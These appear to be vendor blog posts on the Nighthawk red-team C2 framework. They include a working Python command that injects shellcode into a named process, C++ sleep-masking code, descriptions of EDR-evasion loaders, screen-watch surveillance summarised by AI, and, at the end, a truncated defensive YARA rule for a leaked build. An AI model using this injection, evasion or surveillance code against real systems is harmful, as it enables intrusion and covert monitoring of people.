In November ‘24 we added client-side scripting support inside the Nighthawk UI. This post serves as a working example of how to extend Nighthawk through these client side scripts.

As previously noted in the original release post, Nighthawk’s client-side scripting is implemented with Python, using PythonNet and can assist in automating complex tasks or chaining commands together.

One of the interesting things about the client-side Python Modules is that they also have full access to the Nighthawk API. We discussed the Nighthawk API in a previous post, but hopefully this will reinforce how powerful and extensible Nighthawk can be, particularly when it comes to automation. As the API is accessible via client-side scripting, it means that all built-in commands, such as whoami, ls and more can be executed within client-side Python modules, as well as being chained, if required, with execution of external tools such as BOFs, PEs and .NET assemblies.

Building an Example

Let’s look at a practical example of creating a Python Module that registers a new command which gets a process listing via the Nighthawk API, searches for a specific process by name, extracts the PID, then uses a BOF to inject in to the process.

To do this, we’ll create a new function called icmd_inject_by_name which takes two arguments, the list of params and an instance of the AgentInfo class which contains the relevant information about the agent. This is the function that will be executed when a newly registered command is associated with it.

def icmd_inject_by_name(params, info):
    if len(params) < 2 or len(params) > 2:
        nighthawk.console_write(CONSOLE_ERROR,
            "Usage: inject_by_name <PROCESS_NAME> <SHELLCODE_FILE>")
        return

    target_name = params[0]
    shellcode_path = params[1]

Within our function, we can pull a process listing from the endpoint using the api.ps method. This method will return a json response where we can extract the ['CommandResponse']['Processes'] node to get the process listing, then simply iterate through the list of processes until we find any that match the process we’re interested in, and print the results in the beacon console:

    # run ps with detailed information in sync mode
    # positional args: injectable_only, detailed_information, skip_process_names,
    #                  client_id, message_id, show_in_console, sync
    result = api.ps(False, True, [], None, None, False, True)
    result = json.loads(result)
    processes = result['CommandResponse']['Processes']

    # find all matching processes (case-insensitive)
    matches = [
        p for p in processes
        if p.get('ImageName', '').lower() == target_name.lower()
    ]

    if not matches:
        nighthawk.console_write(CONSOLE_ERROR,
            f"No process found with name: {target_name}")
        return

    # display all matches
    lines = [f"Found {len(matches)} matching process(es):"]
    for p in matches:
        fields = [f"PID: {p['ProcessId']}"]
        if 'ParentProcessId' in p:
            fields.append(f"PPID: {p['ParentProcessId']}")
        if 'SessionId' in p:
            fields.append(f"Session: {p['SessionId']}")
        if 'UserName' in p:
            fields.append(f"User: {p['UserName']}")
        if 'Arch' in p:
            fields.append(f"Arch: {p['Arch']}")
        lines.append(f"  {', '.join(fields)}")
    nighthawk.console_write(CONSOLE_INFO, '\n'.join(lines))

Once we’ve found a matching process, we’ll take the PID of the first (because YOLO), read some shellcode from disk (using our custom _inj_read_local_file helper) then load the BOF file (using another custom helper _inj_load_bof):

    # use the first match
    pid = matches[0]['ProcessId']
    nighthawk.console_write(CONSOLE_INFO,
        f"Targeting PID: {pid} ({matches[0].get('ImageName', '')})")

    # read shellcode from operator's local file
    shellcode = _inj_read_local_file(shellcode_path)
    if shellcode is None:
        return

    nighthawk.console_write(CONSOLE_INFO,
        f"Loaded {len(shellcode)} bytes of shellcode from {shellcode_path}")

    # load the createremotethread BOF
    bof_data = _inj_load_bof(info, "createremotethread")
    if bof_data is None:
        return

One of the great things about Nighthawk’s BOF loader is it fully supports Cobalt Strike’s Beacon API, meaning that users can take advantage of the many open source community BOFs. There is however a little twist in this though, in that the Nighthawk BOF loader supports an enable_opsec argument, which if set to True (the 5th argument to api.execute_bof), will tell the loader to remap any suspicious Windows APIs (eg. VirtualProtect, VirtualAlloc etc) to Nighthawk’s opsec equivalents.

For this example, we’re going to use the TrustedSec createremotethread BOF, which takes two arguments, the PID and the shellcode bytes. To apply this in Nighthawk, we need to use the Packer class, which allows you to pack arguments of various types before passing them to the method that performs execution (in this case a BOF with execute_bof):

    # pack arguments: i = uint32 PID, b = shellcode bytes
    p = Packer()
    p.adduint32(pid)
    p.addbytes(shellcode)

    # execute
    arch = info.Agent.ProcessArch
    api.execute_bof(
        f"createremotethread.{arch}.o", bof_data, p.getbuffer(),
        "go", True, 0, False, "", show_in_console=True,
    )

To register the command within the Nighthawk UI, where it’ll be visible in the help menu and to support tab completion, we can use the nighthawk.register_command method, as follows:

nighthawk.register_command(icmd_inject_by_name, "inject_by_name",
    "Finds a process by name using ps (detailed) and injects shellcode "
    "into the first matching PID using the createremotethread BOF",
    "Find process by name and inject shellcode via createremotethread",
    "inject_by_name <PROCESS_NAME> <SHELLCODE_FILE>",
    "inject_by_name notepad.exe C:\\shellcode.bin")

The complete example can be found below:

import json

# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------

def _inj_load_bof(info, bof_name):
    """Load BOF binary for the agent's architecture."""
    arch = info.Agent.ProcessArch
    path = nighthawk.script_resource(f"{bof_name}/{bof_name}.{arch}.o")
    try:
        with open(path, "rb") as f:
            data = f.read()
        if len(data) == 0:
            nighthawk.console_write(CONSOLE_ERROR, f"BOF file is empty: {path}")
            return None
        return data
    except Exception:
        nighthawk.console_write(CONSOLE_ERROR, f"Could not read BOF file: {path}")
        return None

def _inj_read_local_file(filepath):
    """Read a local file and return its bytes, or None on error."""
    try:
        with open(filepath, "rb") as f:
            data = f.read()
        if len(data) == 0:
            nighthawk.console_write(CONSOLE_ERROR, f"File is empty: {filepath}")
            return None
        return data
    except Exception:
        nighthawk.console_write(CONSOLE_ERROR, f"Could not read file: {filepath}")
        return None

# ---------------------------------------------------------------------------
# Command Handler
# ---------------------------------------------------------------------------

def icmd_inject_by_name(params, info):
    if len(params) < 2 or len(params) > 2:
        nighthawk.console_write(CONSOLE_ERROR,
            "Usage: inject_by_name <PROCESS_NAME> <SHELLCODE_FILE>")
        return

    target_name = params[0]
    shellcode_path = params[1]

    # run ps with detailed information in sync mode
    # positional args: injectable_only, detailed_information, skip_process_names,
    #                  client_id, message_id, show_in_console, sync
    result = api.ps(False, True, [], None, None, False, True)
    result = json.loads(result)
    processes = result['CommandResponse']['Processes']

    # find all matching processes (case-insensitive)
    matches = [
        p for p in processes
        if p.get('ImageName', '').lower() == target_name.lower()
    ]

    if not matches:
        nighthawk.console_write(CONSOLE_ERROR,
            f"No process found with name: {target_name}")
        return

    # display all matches
    lines = [f"Found {len(matches)} matching process(es):"]
    for p in matches:
        fields = [f"PID: {p['ProcessId']}"]
        if 'ParentProcessId' in p:
            fields.append(f"PPID: {p['ParentProcessId']}")
        if 'SessionId' in p:
            fields.append(f"Session: {p['SessionId']}")
        if 'UserName' in p:
            fields.append(f"User: {p['UserName']}")
        if 'Arch' in p:
            fields.append(f"Arch: {p['Arch']}")
        lines.append(f"  {', '.join(fields)}")
    nighthawk.console_write(CONSOLE_INFO, '\n'.join(lines))

    # use the first match
    pid = matches[0]['ProcessId']
    nighthawk.console_write(CONSOLE_INFO,
        f"Targeting PID: {pid} ({matches[0].get('ImageName', '')})")

    # read shellcode from operator's local file
    shellcode = _inj_read_local_file(shellcode_path)
    if shellcode is None:
        return

    nighthawk.console_write(CONSOLE_INFO,
        f"Loaded {len(shellcode)} bytes of shellcode from {shellcode_path}")

    # load the createremotethread BOF
    bof_data = _inj_load_bof(info, "createremotethread")
    if bof_data is None:
        return

    # pack arguments: i = uint32 PID, b = shellcode bytes
    p = Packer()
    p.adduint32(pid)
    p.addbytes(shellcode)

    # execute
    arch = info.Agent.ProcessArch
    api.execute_bof(
        f"createremotethread.{arch}.o", bof_data, p.getbuffer(),
        "go", True, 0, False, "", show_in_console=True,
    )

# ---------------------------------------------------------------------------
# Registration
# ---------------------------------------------------------------------------

nighthawk.register_command(icmd_inject_by_name, "inject_by_name",
    "Finds a process by name using ps (detailed) and injects shellcode "
    "into the first matching PID using the createremotethread BOF",
    "Find process by name and inject shellcode via createremotethread",
    "inject_by_name <PROCESS_NAME> <SHELLCODE_FILE>",
    "inject_by_name notepad.exe C:\\shellcode.bin")

In action, the new command would look something like this:

A similar approach to the above can also be taken from .NET assemblies and native EXEs, using the api.inproc_execute_assembly and api.execute_exe methods.

As a bonus, we also recently released HawkEye to customers, an AI Slack bot powered by Opus 4.5 that uses RAG to create a knowledge base of the documentation and code samples. Interestingly, HawkEye was trivially also able to build Python Modules using simple prompts, such as the following where we ask it to make a new command that runs the whoami BOF:

What was more impressive was that it also provide an alternative implementation that simply printed the results of the BOF rather than parsing them through a callback:

To assist in your Nighthawk Python Module development, we’ve provided CNA ports for TrustedSec’s Situational Awareness, Injection and Remote Ops BOFs; pull requests are available here and here.

If you’ve been following our trajectory over the past 12 months, you will have noticed some of the significant design and architecture changes we’ve been making. The largest of which was the full rewrite of the backend teamserver and introduction of JSON RPC APIs which we’ve discussed in previous posts. One of the key drivers for these changes was to pre-position the framework for what we’ll be releasing in Nighthawk 0.4, which will be soon released customers over the coming weeks.

Open For Business

Red Team Operations are multi-faceted, and adaptability is a key requirement for ensuring continued success. It is not unusual during an operation to find yourself with execution on a variety of different platforms outside of the traditional Windows environments. There are also from time to time circumstances where you might also find yourself in scenarios where its preferable to have your agent execution in a specific language, for example to be able to blend in to the environment.

The ability to develop your own custom agents, and have them integrated in to a single backend API, is therefore a beneficial model for operators. This concept is supported inside the open source Mythic framework, and it’s an idea we’ve always admired.

Such flexibility promotes staging, a concept that is heavily used in our own red team engagements as you’ll find out in latter sections of this post.

With Nighthawk 0.4, we introduced a new feature we’re labelling “Open Agent”; another Nighthawk first for commercial C2s. Open Agent allows you to develop and integrate your own agents, whether they’re complete agents or stage 1s, in to Nighthawk. Open Agents will communicate with Nighthawk backend API and appear in the UI, where they can be controlled, in the same way as the Nighthawk C2 agent.

To facilitate Open Agent, we’ve provided customers with extensive documentation and samples on Nighthawk’s C2 protocol and tasking commands. This includes the expected format for all of the built-in commands, how they’re serialised, compressed and encrypted. This enables Nighthawk users to not only build their own agents, but add support for existing commands. For example, should a user desire to build a .NET agent, they may wish to implement the CPMT_EXECUTE_ASSEMBLY command which would allow them to execute inline .NET assemblies in their own agent but taking advantage of the existing inproc-execute-assembly command from the UI and backend API server.

At minimum, Open Agents must implement the following three tasking commands, while respecting the communication protocol:

• CPMT_GET_DETAILED_INFO: Allows the backend to obtain basic information about the machine in which the OA is running on, needed for populating several UI elements.
• CPMT_GET_CONFIG: Allows the backend to know the sleep and fragmentation settings of the OA.
• CPMT_TERMINATE_PROCESS: Allows the operator to instruct the OA to terminate its own execution.

In addition to Open Agents implementing any of the built-in tasking commands, we also added support for them to roll their own custom commands. Custom commands are implemented using the CPMT_OPEN_AGENT_CMD command type. This means that an Open Agent is able to completely implement its own unique C2 commands; for example you could have a macOS JXA agent that implemented it’s own execute-jxa command. Open Agent custom commands can be integrated in to the Nighthawk UI using Nighthawk’s client-side Python modules.

With this release, we’ve provided two sample Open Agents; a python Nighthawk agent and a .NET based agent.

In the video below we can see both python (pyHawk) and .NET (SharpHawk) Open Agents running on macOS and integrating to the Nighthawk UI and backend. The video also shows how custom commands are added to these agents, in this case basic commands for greet and sum:

Taking Center Stage

The concept of staging is one that is used heavily in MDSec’s own red team operations. Staging provides red teamers with a number of benefits, including a tiny initial footprint, compartmentalisation for burnable payloads, reduced exposure of your stage 2 implants and smaller IoCs due to a minimalistic implant.

Complementing our Open Agent feature, in our 0.4 release we’ve introduced a suite of new staging tools we’ve dubbed the Stager Kit. This suite is compromised of NHStager, a Builder, Visual Studio code templates and a new OpSec driven loader.

The Nighthawk framework now provides the optional ability to deploy implants across stages 0 to 2, where NHLoader PE artifacts can be used to load NHStager implants, to triage and assess a host and environment, prior to in-memory loading the stage 2 implants such as Nighthawk. This might look as follows:

The Stager Kit is a plugin based stage 1 framework designed with OpSec and malleability in mind when used in conjunction with our loader (detailed below). The Stager Kit comes with stage 1 agent, NHStager, which are present provides a SMB based server agent.

NHStager supports a minimal set of commands, including:

whoami, getosversion, ps, execute-bof, inject, ls, mv, cp, rm , mkdir, rmdir, upload, download and shutdown NHStager comes with a built-in BOF loader, with full support for the Cobalt Strike BOF API. This allows post-exploitation actions to be performed from within the stage 1, using existing public tooling.

Each component of NHStager is extensible through a plugin based architecture, including even the server component, meaning that custom agents can be built for arbitrary protocols. With this release we provide an OpSec implementation of an SMB stage 1, complete with a set of evasive plugins.

Further, we also provide a source code based example of a TCP stage 1 as part of the Stager Kit. This comes in the form of a Visual Studio project built for developing your own NHStager agents and plugins. NHStager agents do not need to beacon by default (however this can be achieved and even integrated as an Open Agent), acting as a server based listener, waiting for communications from the client. An example client is provided in the form of a BOF with a client-side Nighthawk Python module.

To process the plugins and construct the stage 1, we provide a builder tool which will process the list of plugins, configure and build the final stage 1 DLL:

Nighthawk Stager Build Tool

Option '--plugins' is required.
Option '--arch' is required.

Description:
  Build a Nighthawk stager

Usage:
  Builder [options]

Options:
  --plugins <plugins> (REQUIRED)  Specify one or more paths to plugins that the stager should use
  --config <config>               Configuration for the server plugin. This data will be serialized according to the
                                  prefix and passed to the server plugin in the order it was specified. The valid
                                  prefixes are:
                                    f - The contents of a file, e.g. f"Bar.bin"
                                    z - Null-terminated ANSI string, e.g. z"foobar"
                                    Z - Null-terminated unicode string, e.g. Z"foobar"
                                    b - Binary data in hexadecimal form, e.g. b"012345" becomes 01 23 45
                                    i - 4 byte integer in decimal form e.g. i"123,456"
                                    l - 8 byte integer in decimal form e.g. l"5,294,967,295"
  --spawnto64 <spawnto64>         The x64 SpawnTo value that will be returned by the BOF API [default:
                                  C:\Windows\System32\rundll32.exe]
  --spawnto86 <spawnto86>         The x86 SpawnTo value that will be returned by the BOF API [default:
                                  C:\Windows\System32\rundll32.exe]
  --arch <x64|x86> (REQUIRED)     Specify the architecture of the generated stager
  --version                       Show version information
  -?, -h, --help                  Show help and usage information

To streamline interaction with NHStager servers, we’ve also provided a client-side Python module that allows you to execute any of the stage 1 server commands more seamlessly from within Nighthawk.

For example, to run a BOF on your NHStager server running on a remote host, you might do something like the following which shows us executing a BOF:

Building a NHStager Plugin

NHStager is built to be extended such that custom stage 1 implants can be developed by its operators. This is achieved through a plugin-based framework, where plugins are integrated in to final DLL using aforementioned builder. NHStager itself has minimal OpSec, but is specifically designed to be used in conjunction with our loader (detailed below).

NHStager plugins come in the form of DLLs, with a slightly modified definition of DllMain:

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved,
                       PSTAGER Stager)
{
    switch (ul_reason_for_call)
    {
		case DLL_PROCESS_ATTACH:
        {
	        break;
        }

		case DLL_PROCESS_DETACH:
	    {
		    break;
	    }
    }

    return TRUE;
}

The eagled eyed reader will note the additional Stager parameter. This is a pointer to a structure that is shared by the stager and all of its plugins, and which contains metadata about the stager as well as an array of function pointers for the Stager API.

Via the Stager API, operators are able to hook various features of the stager to allow custom implementations; this includes things like GetProcAddress, GetModuleHandleA, GetModuleHandleW ,LoadLibrary, the process injection routines, sleep masking, the communications methods and the syscall implementations used by the BOF API.

For example, to implement a custom sleep masking, ServerSleep can be hooked like the below within a plugin:

Core = Stager;
Core->Api.ServerSleep = reinterpret_cast<decltype(ServerSleep)*>(StubSleep);

An implementation of a sleep masking stub can then then be implemented. For example, a basic implementation below is shown that will encrypt the stager in memory, alongside all its plugins, marking those sections as PAGE_READWRITE in the process. We of course wouldn’t recommend this for use in live operations, but it serves as a simple example of how NHStager plugins can be extended to implement custom functionality:

ULONG APIENTRY StubSleep(_In_ BOOLEAN Wait, _In_opt_ ULONG Count, _In_reads_(Count) HANDLE Handles[], _In_opt_ BOOLEAN WaitAll, _In_ BOOLEAN Alertable, _In_opt_ ULONG Timeout)
{
    //
    // Encrypt the stager and all other plugins beside us
    //

    ULONG OldProtect{};

    for (AUTO Next{ Core->Plugins.Flink }; Next != &Core->Plugins; Next = Next->Flink)
    {
        AUTO Plugin{ CONTAINING_RECORD(Next, PLUGIN_INFORMATION, ListEntry) };

        if (reinterpret_cast<PUCHAR>(StubSleep) >= reinterpret_cast<PUCHAR>(Plugin->BaseAddress) 
            &&
            reinterpret_cast<PUCHAR>(StubSleep) <= reinterpret_cast<PUCHAR>(Plugin->BaseAddress) + Plugin->Length)
        {
            continue;
        }

        VirtualProtect(Plugin->BaseAddress, Plugin->Length, PAGE_READWRITE, &OldProtect);
        RtlEncryptMemory(Plugin->BaseAddress, Plugin->Length - (Plugin->Length % RTL_ENCRYPT_MEMORY_SIZE), 0);
    }

    PVOID  StagerAddress{ Core->StagerAddress };
    SIZE_T StagerSize   { Core->StagerSize };

    VirtualProtect(StagerAddress, StagerSize, PAGE_READWRITE, &OldProtect);
    RtlEncryptMemory(StagerAddress, StagerSize - (StagerSize % RTL_ENCRYPT_MEMORY_SIZE), 0);

    //
    // Now sleep
    //

    ULONG Result{};

    if (Wait == TRUE)
    {
        Result = WaitForMultipleObjectsEx(Count, Handles, WaitAll, Timeout, Alertable);
    }
    else
    {
        Result = SleepEx(Timeout, Alertable);
    }

    //
    // Decrypt the stager and plugins and fix their memory permissions
    //

    RtlDecryptMemory(StagerAddress, StagerSize - (StagerSize % RTL_ENCRYPT_MEMORY_SIZE), 0);
    FixSectionPermissions(Core->StagerAddress, Core->NumberOfSections, Core->StagerSections);

    for (AUTO Next{ Core->Plugins.Flink }; Next != &Core->Plugins; Next = Next->Flink)
    {
        AUTO Plugin{ CONTAINING_RECORD(Next, PLUGIN_INFORMATION, ListEntry) };

        if (reinterpret_cast<PUCHAR>(StubSleep) >= reinterpret_cast<PUCHAR>(Plugin->BaseAddress)
            &&
            reinterpret_cast<PUCHAR>(StubSleep) <= reinterpret_cast<PUCHAR>(Plugin->BaseAddress) + Plugin->Length)
        {
            continue;
        }

        RtlDecryptMemory(Plugin->BaseAddress, Plugin->Length - (Plugin->Length % RTL_ENCRYPT_MEMORY_SIZE), 0);
        FixSectionPermissions(Plugin->BaseAddress, Plugin->NumberOfSections, Plugin->SectionHeaders);
    }

    return Result;
}

Once the custom plugin set has been compiled, they can be included in the final stage 1 output by passing them to the builder using the --plugins argument.

Bootstrap Your OpSec

To complement NHStager, we developed a new loader that is integrated in to the Nighthawk backend API and UI payload generator. The loader uses a plugin architecture to provide evasive strategies to PE, while converting them to PIC shellcode. The loader is intended to provide configurable evasion for NHStager, any custom PEs the user wishes to run and in the longer term will completely replace Nighthawk’s own reflective loader. In this release, aside from NHStager, the loader replaces Nighthawk’s previous keying and compression implementations. While this facilitates many of the same keying strategies as prior releases, it now provides the capability to stack them. That is, keying can be performed multiple times, using multiple keys. For example, the Nighthawk shellcode could be first encrypted against the current user’s username, then with a key derived from the machine name, then against an environment variable and finally with a key retrieved from a HTTPS request.

The loader provides a multitude of OpSec options that can be made persistent across the loaded PE through IAT hooks; the available plugins include:

• Custom unhooking to remove user mode hooks,
• A call stack spoofing plugin that masks the stack of threads generated by the PE,
• Capability to clear the process instrumentation callback,
• A syscall proxy to allow the PE to perform indirect syscall execution via the threadpool,
• An opsec LoadLibrary implementation to proxy DLL loads,
• A plugin to dynamically resolve and perform indirect syscalls,
• An IAT hook plugin to redirect API calls made by the PE to the loaders OpSec plugin implementations,

If the IAT hook plugin is enabled, the selected OpSec strategies will apply globally across the PE. The loader can be used to convert any PE (DLL or EXE) to PIC; for example, the operator may want to turn other tools such as Chisel or mimikatz to PIC shellcode, which can easily be achieved using the loader.

Additionally, the outputted PIC shellcode is obfuscated using a new mutation engine built to support the loader, helping to evade static signatures that may be crafted for detection purposes.

NHConfigurator

Nighthawk is highly configurable, with operators able to change almost every component of the beacons loading and runtime configuration to alter the beacon’s behaviour. However, with this flexibility comes complexity. In order to help assist operators in rapidly configuring and deploying Nighthawk profiles, we developed NHConfigurator.

NHConfigurator is a simple UI based wizard that allows operators to cherry pick which high-level OpSec configuration options they want, while also automatically creating random beacon network profiles, producing nginx location rules and optionally deploying the configuration to the backend teamserver.

Alternatively, a simple step profile generation is available that allows the operator to select the recommended profile based on that commonly seen to be successful against a given EDR solution, with EDR presets.

In the video below, we give a quick demonstration of NHConfigurator and its capabilities for profile generation:

As we draw to a close on the beta testing, we anticipate pushing Nighthawk 0.4 out to customers over the coming weeks.

In June ‘24, we released Nighthawk 0.3; the main focus of this release was a major overhaul of our backend infrastructure. This included the addition of a JSON RPC web service API to support red teams in automating operational actions and to facilitate integration with other resources. Every component of the framework (beacon, artifacts and team servers) can be instrumented through the API. To our knowledge, this was the first time such features had been made available in a commercial C2 framework.

Since then, the API has been heavily adopted by our customers and we’ve heard many success stories about the power this brought them.

In this post, we’ll walk through how the Nighthawk API works, whats available and illustrate a couple of examples of how this can be integrated in to your operations to improve operator efficiency.

Overview

The Nighthawk API can be accessed over HTTPS or via WebSocket for real-time event notification. To support development against the API, we’ve provided both Swagger and Redoc documentation, these allow requests to be manually crafted against the API:

To fast track development, we’ve also provided libraries in .NET and python, as well as a large number of examples for performing different tasks such as:

• Programmatically running BOFs and assemblies,
• Creating payloads,
• Sending commands to beacons,
• Receiving images from the built-in screenwatch

Developing with the .NET API

The .NET API library can be found in the Samples\ApiClient folder of the build. The library comes in the form of a Visual Studio project, and can be added to any existing solution that you want to use for developing against the API. An example of this is the Samples\API project which imports the BackendClient project to leverage its helper methods:

To make use of the BackendClient API, import it to your project by adding using BackendClient.API; ; this should now make all helper methods available to you.

When building out your project, the first thing you need to do in order to interact with the API is establish an authenticated session; the ApiClient class from the Backend provides a number of helper methods to do this, for example:

static void Main(string[] args)
{
    ApiClient.VerifySSL = false;
    
    ApiClient.Connect("nighthawk.team.server", 8888, true);

    var loginResult = ApiClient.User_Login("dmc", "secretpassword");

    ApiClient.SessionId = loginResult.SessionId.ToString();

These steps are common across all projects and a precursor to authenticating with the API. Let’s now look at building out a practical example. In this fun example, we’ll build a tool that connects to the Nighthawk API, starts the screenwatch command and periodically receives the images of the user’s actions which are then submitted to an internal AI to receive a description of what the user is doing.

Once an authenticated session is established, scripts and tools are then able to register for notifiable events over a WebSocket connection. This is achieved using the PushClient class which will execute any callbacks setup by the scripting clients.

In the case of the screenwatch command, the relevant PushClient notification is of type ScreenWatchUpdateNotification and can be registered as follows:

var pushClient = PushClient<ScreenWatchUpdateNotification>.Register(
	PushNotificationType.ScreenWatchNotification,
	ScreenWatchUpdateNotificationReceived
);

In this example, we’re registering a PushClient callback of ScreenWatchUpdateNotificationReceived, which we will go on to implement ourselves. Inside our callback, we’re able to receive the raw image from the screenwatch event using the ApiClient.ScreenWatch_LastCapture method which we can then process however we choose. The full implementation for our screenwatch notification callback is as follows:

private static void ScreenWatchUpdateNotificationReceived(ScreenWatchUpdateNotification notification)
{
    Console.WriteLine($"Screenwatch: {notification.ClientId} - {notification.UpdateTime} - {notification.ScreenWatchResponse.Command}");

    if (notification.ScreenWatchResponse.Command == EScreenWatchCommandType.CAPTURE &&
        notification.ScreenWatchResponse.Success)
    {
        var capture = ApiClient.ScreenWatch_LastCapture(notification.ClientId);

        Console.WriteLine($"Image captured {capture.CaptureImage.Length:n0} bytes");

        lock (_imageLock)
        {
            ProcessImage(capture.CaptureImage);
        }
    }
}

Now that our callback is defined, we can retrieve a list of agents from the API using the Agent_List method, and starting the screenwatch command on the agent with ScreenWatch_Start:

var agents = ApiClient.Agent_List().OrderByDescending(a => a.LastActivity);
ApiClient.ScreenWatch_Start(agents.First().ClientId, 0);
pushClient.Connect();

Console.WriteLine("Waiting for response; type 'q' and enter to finish");
Console.WriteLine($"Using OpenWebUI at: {_openWebUIBaseUrl}");
Console.WriteLine($"Using model: {_modelName}");

while (Console.ReadLine() != "q") continue;

pushClient.Disconnect();

In our example, ProcessImage goes on to use OCR using Tesseract from the image and hands off the text to OpenWebUI's API to generate a human-readable summary of what the user is doing. Only meaningful events are processed from the user’s activity by calculating a Levenstein distance for changes and only submitting the changes over an appropriate threshold. We’re not going to walk through the entirety of this example as the OpenWebUI processing is beyond the scope of the intended focus of this post, but you can find the full implementation of ScreenWatchOpenWebUI here.

The example below shows the .NET API starting the screenwatch command on a beacon, then receiving images which it asks for the AI to summarise as the user’s activity changes:

Developing with the Python API

In addition to the .NET API library, we also provide a python implementation that works in a similar manner. The python library can be found in the Samples\nighthawk_api folder of the release, and installed using Python pip, with the pip install . command. A large number of examples can be found in the examples folder.

The Python library works in a similar way to the .NET version, exposing a number of methods for interacting with Nighthawk inside the Api class. Let’s walkthrough an example of how you monitor for new beacons and automatically perform some triage when a new beacon notification event occurs. The first action of building any scripts against the backend API is to authenticate to the Nighthawk, the api.user_login is provided to do this as follows:

api = nh.Api(domain=args.server, verify_ssl=args.ignore_ssl is False)
    await api.user_login(args.username, args.password)
    if api.connected is False:
        return

The Python API also similarly contains a PushClient class which allows the script to register for notification events and register a callback to handle them. This can be done similar to the below, where our script registers to receive events of type AgentUpdateNotification (changes to agents) which it will handle with the callback decorator_new_agent_notification_received (implemented in new_agent_notification_received):

push_client = nh.PushClient(api=api)

await push_client.register(nh.notification_types['AgentUpdateNotification'], decorator_new_agent_notification_received)

connect_task = await push_client.connect()

In our example, new_agent_notification_received acts as a simple wrapper to execute_triage_commands where the triage tasking is performed. In this example, we’ll execute a number of API calls to collect folder listings, process listing a list of installed application and run a BOF. Each of these tasks registers a callback, such as await api.ls(directory, client_id=client_id, callback=ls_callback) . The callback is however optional and without it the task will run synchronously, where the result can be stored via assignment. Our execute_triage_commands command looks as follows:

async def execute_triage_commands(client_id, api):
    """Execute all triage commands for a new agent"""
    print(f"New Agent: {client_id}. Running triage...")

    # Create callbacks
    ls_callback = create_ls_callback(client_id, api)
    ps_callback = create_ps_callback(client_id, api)
    applist_callback = create_applist_callback(client_id, api)
    bof_callback = create_bof_callback(client_id, api)

    # Execute triage commands
    for directory in TRIAGE_DIRECTORIES:
        await api.ls(directory, client_id=client_id, callback=ls_callback)

    await api.ps(False, True, SKIP_PROCESSES, client_id=client_id, callback=ps_callback)
    await api.applist(client_id=client_id, callback=applist_callback)

    # Execute BOF for domain information
    await execute_domain_bof(client_id, api, bof_callback)

Each of our callbacks provides access to the result of the task inside the CommandResponse attribute of the notification; this in turn has a number of task specific attributes depending on the type of command being executed. For example, our ls callback command may look as follows:

def create_ls_callback(client_id, api):
    """Create directory listing callback for a specific client"""
    async def ls_callback(notification, push_client, api_param):
        try:
            cr = notification['CommandResponse']
            init_triage_data(client_id)

            path = cr['Path']
            files = [f['FileName'] for f in cr['FileListingEntries']]
            triage_data[client_id]['directories'][path] = files

            print(f"Directory listing for {path}: {len(files)} items")
            await check_triage_completion(client_id, api)

        except Exception as e:
            print(f"Error in directory listing callback: {e}")

    return ls_callback

Once the triage data is all collected, we can again hand off this data to an AI in our example, and prompt it to summarise the results.

The example in the video below shows a new beacon checking in, with a python script running with an agent notification subscription. When the beacon checks in, the script runs a number of commands to triage the hosts and asks the AI to summarise the results:

While the examples we’ve demonstrated are relatively basic, they provide an illustration of how harnessing Nighthawk’s API can be incredibly powerful. Other example use cases could include automatically deploying persistence, notification of new agents, integration with other resources such as Slack or Mattermost, or AI systems as we’ve shown above.

The complete sample code for these examples can be found on this Nighthawk github repository.

At the start of July, we released Nighthawk 0.3.4 to customers. It’s been some time since our last release and there’s good reason for that, which we’ll outline below, but suffice to say the team have been exceptionally busy building new tools and continuing to work on new groundbreaking R&D which customers will start to see the fruits of over the coming releases.

Undressing the Elephant

Before we dive in to this release, let’s first address the elephant in the room. In February this year, some components of an older Nighthawk version (from October 2022) were being publicly shared in various underground forums, Telegram and on other exchanges. This was not a complete build, and could not be used in its existing form. Irrespective, this was clearly not acceptable. To understand how this came to pass and what we did at the time, let’s rewind back further.

In December 2024, roughly 3 months before this release was being publicly shared, we noted a user on both XSS.is and Telegram offering the software for sale. Now, it’s worth mentioning that we pro-actively monitor these and other underground forums/marketplaces using both automated and manual analysis, looking for any references to our software. We consider this part of our pro-active approach to product protection. There have been many individuals claiming to have access to the software and offering it for sale. However, engaging with these users had always historically revealed them to be scams, with the seller either being unable to produce any evidence they had the software or sending us a terribly edited photo from one of our public screenshots or videos. This occasion was however different, and the seller showed us enough credible evidence to suggest that they either had some components of the software, or knew someone who did. We agreed to purchase the software from the seller so that we could do our own analysis on what they had.

Once we’d obtained a copy, we were able to quickly confirm that it was a genuine but heavily modified copy of the teamserver and C2 client software, with the licensing restrictions removed. While this was disappointing, thanks to our watermarking, we were able to quickly identify the customer, an internal red team at a large US financial, as the source of the leak. While it was never determined how the leak occurred, from our analysis of the build we were able to attribute the cracked copy had been rebundled by a Chinese actor due to some Jetbrains metadata left behind.

At this stage, we decided there were a number of short, medium and longer term actions that we needed to take.

The first was we immediately contacted the customer and informed them of the leak and asked them to investigate it. To limit any further damage or leaks of newer versions of the software, we disabled their access and terminated their licenses due to breach of our software EULA.

At this time, we don’t believe the software was being widely shared and because we were able to pro-actively identify it early, we had an opportunity to limit any future damages it might cause should it re-engineered to be functional. As such, in early January we decided to contact a number of defensive vendors, inform them about the leak and offer some detection support. Specifically, we reached out to Microsoft, CrowdStrike, SentinelOne, Palo Alto, Elastic and Huntress providing them with some intelligence and detection support. While we noted that the existing public Elastic Yara rule was able to detect this older version of the software, it was somewhat incomplete; we provided them with a more extensive version targeted only at the leaked build, that would detect both x86 and x64 versions of the beacon irrespective of configuration. We’re now publicly sharing this below:

import "pe"
 
rule leaked_nighthawk_0_2_1_x64 {
    meta:
        author = "MDSec Consulting Ltd"
        id = "33c3476a-cc96-43c5-979d-1d0f6a1cb017"
        creation_date = "2025-01-09"
        last_modified = "2025-01-09"
        reference_sample = "e180751a9d9c34c3daf62b90f5750999fb0232bfb336915661189b7f751add10"
        threat_name = "Nighthawk.Leaked.0-2-1"
        severity = 100
        arch_context = "x64"
        scan_context = "file, memory"
        os = "windows"
    strings:
               $nh_shellcode_sequence_2 = { 00 00 00 48 8D 15 78 42 0E 00 48 8D 8D 40 07 00 00 E8 B8 A1 00 00 48 8D 95 40 07 00 00 48 8D 8D }
               $nh_shellcode_sequence_3 = { 48 2B C6 48 83 C0 F8 48 83 F8 1F 0F 87 B7 00 00 00 48 8B CE E8 CF 48 01 00 4C 8B 6D B0 45 8B 46 }
